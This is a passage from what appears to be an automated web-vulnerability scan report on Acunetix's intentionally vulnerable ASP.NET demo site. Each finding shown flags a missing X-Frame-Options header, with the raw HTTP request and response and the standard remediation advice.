          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8DK3Y7%2FBz6vaeG4S8AOaGVC7NUiA%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 12371
          
          
          Response body (12371 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="…" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        19. POST http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/login.aspx
          Content-Length: 1197
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1197 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8xY%2BHkfERpF5ijDSZsRL1CxlmHEA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 13281
          
          
          Response body (13281 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="…" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        20. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Content-Length: 6543
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6543 bytes)
